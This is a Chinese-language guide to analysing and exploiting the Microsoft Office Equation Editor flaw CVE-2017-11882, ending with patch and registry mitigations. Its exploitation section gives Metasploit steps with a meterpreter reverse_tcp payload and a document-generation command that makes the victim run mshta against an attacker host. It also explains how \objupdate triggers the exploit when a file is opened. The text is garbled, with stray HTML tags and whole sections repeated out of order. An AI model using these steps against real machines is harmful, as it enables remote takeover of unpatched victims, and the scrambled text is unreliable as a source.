Microsoft Office CVE-2017-11882漏洞分析与利用指南<\/h1>

一、漏洞概述<\/h2>
CVE-2017-11882<\/strong>是Microsoft Office中的一个高危漏洞，属于缓冲区溢出类型漏洞。该漏洞存在于EQNEDT32.EXE（微软Office自带的公式编辑器）组件中。<\/p>

漏洞基本信息<\/h3>

漏洞ID<\/strong>: CVE-2017-11882<\/li>
漏洞名称<\/strong>: Microsoft Office数学公式编辑器内存损坏漏洞<\/li>
漏洞类型<\/strong>: 远程代码执行<\/li>
威胁类型<\/strong>: 栈溢出<\/li>
影响版本<\/strong>: Microsoft Office 2000\/2003\/2007 sp3\/2010 sp2\/2013 sp1\/2016<\/li> <\/ul>
漏洞原理<\/h3>
EQNEDT32.EXE进程在处理包含MathType的OLE数据时，在拷贝公式字体名称(Font Name数据)时没有对名称长度进行校验，导致缓冲区溢出。攻击者可以通过精心构造的恶意文档覆盖函数的返回地址，从而执行任意代码。<\/p>
二、漏洞环境搭建<\/h2>
测试环境<\/h3>

操作系统<\/strong>: Windows 7 32位<\/li>
Office版本<\/strong>: Microsoft Office 2013 sp1<\/li> <\/ul>
漏洞测试工具<\/h3>
GitHub上提供了漏洞测试工具：<\/p>
https:\/\/github.com\/Ridter\/CVE-2017-11882 <\/code><\/pre> 三、漏洞分析<\/h2> 漏洞定位<\/h3> 使用OD(OllyDbg)调试EQNEDT32.EXE进程<\/li> 对WinExec函数下断点（因为漏洞利用通常会调用该函数弹出计算器）<\/li> 分析调用栈，找出溢出点<\/li> <\/ol> 关键分析点<\/h3> 漏洞函数位于41160F处<\/li> [ebp+28]分配的空间为0x24，超过此长度就会产生溢出<\/li> 溢出后会覆盖原始返回地址4115D8<\/li> 覆盖后的地址通常指向shellcode存放的位置（如12F350）<\/li> <\/ul> 数据结构分析<\/h3> 漏洞存在于EQNEDT32.EXE处理Office OLE Equation对象中标记为字体名称记录的字节流中。<\/p> Equation Native数据流结构<\/h4> Equation Native数据流 = EQNOLEFILEHDR + MTEFData MTEFData = MTEFheader + MTEF Byte Stream <\/code><\/pre> EQNOLEFILEHDR头结构<\/strong>（共28字节）：<\/p> struct<\/span> EQNOLEFILEHDR { <\/span><\/span> WORD cbHdr; \/\/ 格式头长度，固定为0x1C <\/span><\/span><\/span><\/span> DWORD version; \/\/ 固定为0x00020000 <\/span><\/span><\/span><\/span> WORD cf; \/\/ 该公式对象的剪贴板格式 <\/span><\/span><\/span><\/span> DWORD cbObject; \/\/ MTEF数据的长度，不包括头部 <\/span><\/span><\/span><\/span> DWORD reserved1; \/\/ 未公开 <\/span><\/span><\/span><\/span> DWORD reserved2; \/\/ 未公开 <\/span><\/span><\/span><\/span> DWORD reserved3; \/\/ 未公开 <\/span><\/span><\/span><\/span> DWORD reserved4; \/\/ 未公开 <\/span><\/span><\/span><\/span>}; <\/span><\/span><\/code><\/pre>FONT记录结构<\/strong>：<\/p> struct<\/span> stuFontRecord { <\/span><\/span> BYTE bTag; \/\/ 字体文件的tag位0x08 <\/span><\/span><\/span><\/span> BYTE bTypeFace; \/\/ 字体风格 <\/span><\/span><\/span><\/span> BYTE bStyle; \/\/ 字体样式 <\/span><\/span><\/span><\/span> BYTE bFontName[n] \/\/ 字体名称，以NULL为结束符 <\/span><\/span><\/span><\/span>}; <\/span><\/span><\/code><\/pre>字段说明：<\/p> 字段<\/th> 值<\/th> 说明<\/th> <\/tr> <\/thead> Tag<\/td> 0x08<\/td> 1字节，固定为0x08<\/td> <\/tr> tface<\/td> typeface number<\/td> 1字节，Typeface编号<\/td> <\/tr> style<\/td> 1或者2<\/td> 1字节，1表示斜体，2表示粗体<\/td> <\/tr> name<\/td> Font name (null-terminated)<\/td> 字体名字，以Null结尾<\/td> <\/tr> <\/tbody> <\/table> 四、漏洞利用<\/h2> 1. 基础利用（弹出计算器）<\/h3> 使用提供的Python脚本生成恶意文档：<\/p> python Command_CVE-2017-11882.py -c "calc.exe" -o test.doc <\/code><\/pre> 2. Metasploit框架利用<\/h3> 环境准备<\/strong>：<\/p> 目标机：Windows 7 + 有漏洞的Office<\/li> 攻击机：Kali Linux<\/li> <\/ul> 步骤<\/strong>：<\/p> 下载Metasploit模块：<\/li> <\/ol> https:\/\/github.com\/0x09AL\/CVE-2017-11882-metasploit <\/code><\/pre> 将组件复制到相应目录： cve_2017_11882.rb → \/usr\/share\/Metasploit-framework\/modules\/exploits\/windows\/smb<\/li> cve-2017-11882.rtf → \/usr\/share\/metasploit-framework\/data\/exploits<\/li> <\/ul> <\/li> 启动Metasploit：<\/li> <\/ol> msfconsole <\/code><\/pre> 查找并使用漏洞模块：<\/li> <\/ol> search 11882 use exploit\/windows\/smb\/cve_2017_11882 <\/code><\/pre> 设置参数：<\/li> <\/ol> set payload windows\/meterpreter\/reverse_tcp set LHOST <攻击机IP> set URIPATH test <\/code><\/pre> 生成恶意文档：<\/li> <\/ol> python Command109b_CVE-2017-11882.py -c "mshta http:\/\/<攻击机IP>:8080\/test" -o test.doc <\/code><\/pre> 目标机打开文档后，攻击机将获得meterpreter会话。<\/li> <\/ol> RTF结构分析<\/h3> 利用\objupdate<\/code>控制字使OLE对象自动更新和加载，无需用户交互即可触发漏洞。默认状态下需要用户双击OLE对象才能生效，通过设置为自动更新，打开文档即可执行恶意代码。<\/p> 五、漏洞修复<\/h2> 1. 官方补丁<\/h3> 下载微软官方补丁进行修复：<\/p> https:\/\/portal.msrc.microsoft.com\/en-US\/security-guidance\/advisory\/CVE-2017-11882 <\/code><\/pre> 2. 禁用EQNEDT32.EXE组件<\/h3> 执行以下命令取消该模块的注册：<\/p> reg add "HKLM\SOFTWARE\Microsoft\Office\Common\COMCompatibility\{0002CE02-0000-0000-C000-000000000046}" \/v "Compatibility Flags" \/t REG_DWORD \/d 0x400 reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COMCompatibility\{0002CE02-0000-0000-C000-000000000046}" \/v "Compatibility Flags" \/t REG_DWORD \/d 0x400 <\/code><\/pre> 3. 开启自动更新<\/h3> 启用Windows Update功能，定期自动更新系统。<\/p> 六、总结<\/h2> CVE-2017-11882是一个影响广泛的Office漏洞，攻击者可以通过精心构造的恶意文档实现远程代码执行。由于EQNEDT32.EXE作为独立进程运行，Office自身的保护机制无法阻止其被利用。建议用户及时安装补丁或禁用相关组件，同时提高安全意识，不要随意打开来源不明的Office文档。<\/p>

字段<\/th>	值<\/th>	说明<\/th> <\/tr> <\/thead>
Tag<\/td>	0x08<\/td>	1字节，固定为0x08<\/td> <\/tr>
tface<\/td>	typeface number<\/td>	1字节，Typeface编号<\/td> <\/tr>
style<\/td>	1或者2<\/td>	1字节，1表示斜体，2表示粗体<\/td> <\/tr>
name<\/td>	Font name (null-terminated)<\/td>	字体名字，以Null结尾<\/td> <\/tr> <\/tbody> <\/table> 四、漏洞利用<\/h2> 1. 基础利用（弹出计算器）<\/h3> 使用提供的Python脚本生成恶意文档：<\/p> python Command_CVE-2017-11882.py -c "calc.exe" -o test.doc <\/code><\/pre> 2. Metasploit框架利用<\/h3> 环境准备<\/strong>：<\/p> 目标机：Windows 7 + 有漏洞的Office<\/li> 攻击机：Kali Linux<\/li> <\/ul> 步骤<\/strong>：<\/p> 下载Metasploit模块：<\/li> <\/ol> https:\/\/github.com\/0x09AL\/CVE-2017-11882-metasploit <\/code><\/pre> 将组件复制到相应目录： cve_2017_11882.rb → \/usr\/share\/Metasploit-framework\/modules\/exploits\/windows\/smb<\/li> cve-2017-11882.rtf → \/usr\/share\/metasploit-framework\/data\/exploits<\/li> <\/ul> <\/li> 启动Metasploit：<\/li> <\/ol> msfconsole <\/code><\/pre> 查找并使用漏洞模块：<\/li> <\/ol> search 11882 use exploit\/windows\/smb\/cve_2017_11882 <\/code><\/pre> 设置参数：<\/li> <\/ol> set payload windows\/meterpreter\/reverse_tcp set LHOST <攻击机IP> set URIPATH test <\/code><\/pre> 生成恶意文档：<\/li> <\/ol> python Command109b_CVE-2017-11882.py -c "mshta http:\/\/<攻击机IP>:8080\/test" -o test.doc <\/code><\/pre> 目标机打开文档后，攻击机将获得meterpreter会话。<\/li> <\/ol> RTF结构分析<\/h3> 利用\objupdate<\/code>控制字使OLE对象自动更新和加载，无需用户交互即可触发漏洞。默认状态下需要用户双击OLE对象才能生效，通过设置为自动更新，打开文档即可执行恶意代码。<\/p> 五、漏洞修复<\/h2> 1. 官方补丁<\/h3> 下载微软官方补丁进行修复：<\/p> https:\/\/portal.msrc.microsoft.com\/en-US\/security-guidance\/advisory\/CVE-2017-11882 <\/code><\/pre> 2. 禁用EQNEDT32.EXE组件<\/h3> 执行以下命令取消该模块的注册：<\/p> reg add "HKLM\SOFTWARE\Microsoft\Office\Common\COMCompatibility\{0002CE02-0000-0000-C000-000000000046}" \/v "Compatibility Flags" \/t REG_DWORD \/d 0x400 reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COMCompatibility\{0002CE02-0000-0000-C000-000000000046}" \/v "Compatibility Flags" \/t REG_DWORD \/d 0x400 <\/code><\/pre> 3. 开启自动更新<\/h3> 启用Windows Update功能，定期自动更新系统。<\/p> 六、总结<\/h2> CVE-2017-11882是一个影响广泛的Office漏洞，攻击者可以通过精心构造的恶意文档实现远程代码执行。由于EQNEDT32.EXE作为独立进程运行，Office自身的保护机制无法阻止其被利用。建议用户及时安装补丁或禁用相关组件，同时提高安全意识，不要随意打开来源不明的Office文档。<\/p>

Microsoft Office CVE-2017-11882漏洞分析与利用指南<\/h1>

一、漏洞概述<\/h2> CVE-2017-11882<\/strong>是Microsoft Office中的一个高危漏洞，属于缓冲区溢出类型漏洞。该漏洞存在于EQNEDT32.EXE（微软Office自带的公式编辑器）组件中。<\/p>

漏洞原理<\/h3> EQNEDT32.EXE进程在处理包含MathType的OLE数据时，在拷贝公式字体名称(Font Name数据)时没有对名称长度进行校验，导致缓冲区溢出。攻击者可以通过精心构造的恶意文档覆盖函数的返回地址，从而执行任意代码。<\/p>

二、漏洞环境搭建<\/h2>

三、漏洞分析<\/h2>

数据结构分析<\/h3> 漏洞存在于EQNEDT32.EXE处理Office OLE Equation对象中标记为字体名称记录的字节流中。<\/p>

四、漏洞利用<\/h2>

RTF结构分析<\/h3> 利用\objupdate<\/code>控制字使OLE对象自动更新和加载，无需用户交互即可触发漏洞。默认状态下需要用户双击OLE对象才能生效，通过设置为自动更新，打开文档即可执行恶意代码。<\/p>

3. 开启自动更新<\/h3> 启用Windows Update功能，定期自动更新系统。<\/p>

一、漏洞概述<\/h2>
CVE-2017-11882<\/strong>是Microsoft Office中的一个高危漏洞，属于缓冲区溢出类型漏洞。该漏洞存在于EQNEDT32.EXE（微软Office自带的公式编辑器）组件中。<\/p>

漏洞原理<\/h3>
EQNEDT32.EXE进程在处理包含MathType的OLE数据时，在拷贝公式字体名称(Font Name数据)时没有对名称长度进行校验，导致缓冲区溢出。攻击者可以通过精心构造的恶意文档覆盖函数的返回地址，从而执行任意代码。<\/p>

数据结构分析<\/h3>
漏洞存在于EQNEDT32.EXE处理Office OLE Equation对象中标记为字体名称记录的字节流中。<\/p>

RTF结构分析<\/h3>
利用`\objupdate<\/code>控制字使OLE对象自动更新和加载，无需用户交互即可触发漏洞。默认状态下需要用户双击OLE对象才能生效，通过设置为自动更新，打开文档即可执行恶意代码。<\/p>`

3. 开启自动更新<\/h3>
启用Windows Update功能，定期自动更新系统。<\/p>